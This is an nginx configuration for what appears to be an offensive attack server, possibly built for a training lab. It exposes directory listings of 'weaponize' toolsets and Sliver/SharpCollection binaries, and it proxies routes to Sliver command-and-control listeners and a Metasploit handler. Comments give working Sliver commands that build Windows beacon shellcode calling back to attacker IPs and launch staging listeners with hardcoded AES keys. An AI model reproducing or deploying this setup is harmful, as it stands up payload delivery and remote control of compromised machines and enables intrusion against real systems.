server {
    listen       8880;
    server_name  localhost;

    #access_log  logs/host.access.log  main;
    #error_page  404              /404.html;
    # redirect server error pages to the static page /50x.html
    #
    error_page   500 502 503 504  /50x.html;
    location = /50x.html {
        root   html;
    }
    location / {
        root   html;
        index  index.html index.htm;
    }
    location /sharp/ {
        alias   /opt/windows/SharpCollection/NetFramework_4.7_x64/;
        autoindex on;
    }
    location /win/ {
        alias   /opt/windows/windows_weaponize/;
        autoindex on;
    }
    location /lin/ {
        alias   /opt/linux/linux_weaponize/;
        autoindex on;
    }
    location /obf/ {
        proxy_pass http://127.0.0.1:8881/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
    location /lab/ {
        proxy_pass  http://127.0.0.1:8884/;
    }
    # http -L 127.0.0.1 -l 8890 --persistent
    location /sliver/ {
        proxy_pass  http://127.0.0.1:8890/;
    }
#    # https --lhost 127.0.0.1 --lport 8891 --persistent --cert /home/jubeaz/sliver.crt --key /home/jubeaz/sliver.key
#    location /sliver_ssl/ {
#        proxy_pass  http://127.0.0.1:8891/;
#    }
    # profiles new beacon --seconds 30 --jitter 3 --os windows --arch amd64 --format shellcode --skip-symbols --http  http://192.168.10.21:80/sliver/pwn jubeaz
    # stage-listener --url http://127.0.0.1:8870 --profile jubeaz  --prepend-size --aes-encrypt-key D(H+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 9y/B?E(G+KbPeShV -C zlib
    location /sl_debug/ {
        proxy_pass  http://127.0.0.1:8870/;
    }
    # profiles new beacon --seconds 30 --jitter 3 --os windows --arch amd64 --format shellcode --skip-symbols --http  https://192.168.10.21:443/sliver/pwn jubeaz_https
    # stage-listener --url http://127.0.0.1:8871 --profile jubeaz_https  --prepend-size --aes-encrypt-key D(H+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 9y/B?E(G+KbPeShV -C zlib    
    location /sl_debug_ssl/ {
        proxy_pass  http://127.0.0.1:8871/;
    }
    # profiles new beacon --seconds 30 --jitter 3 --os windows --arch amd64 --format shellcode --skip-symbols --http  http://10.10.14.17:80/sliver/pwn cybernetics
    # stage-listener --url http://127.0.0.1:8872 --profile cybernetics  --prepend-size --aes-encrypt-key D(H+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 9y/B?E(G+KbPeShV -C zlib
    location /sl_prod/ {
        proxy_pass  http://127.0.0.1:8872/;
    }
    # profiles new beacon --seconds 30 --jitter 3 --os windows --arch amd64 --format shellcode --skip-symbols --http  https://10.10.14.17:443/sliver/pwn cybernetics_https
    # stage-listener --url http://127.0.0.1:8873 --profile cybernetics_https  --prepend-size --aes-encrypt-key D(H+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 9y/B?E(G+KbPeShV -C zlib 
    location /sl_prod_ssl/ {
        proxy_pass  http://127.0.0.1:8873/;
    }
    location ~ ^/msf(.*) {
 	proxy_pass http://127.0.0.1:4445;
    }
}

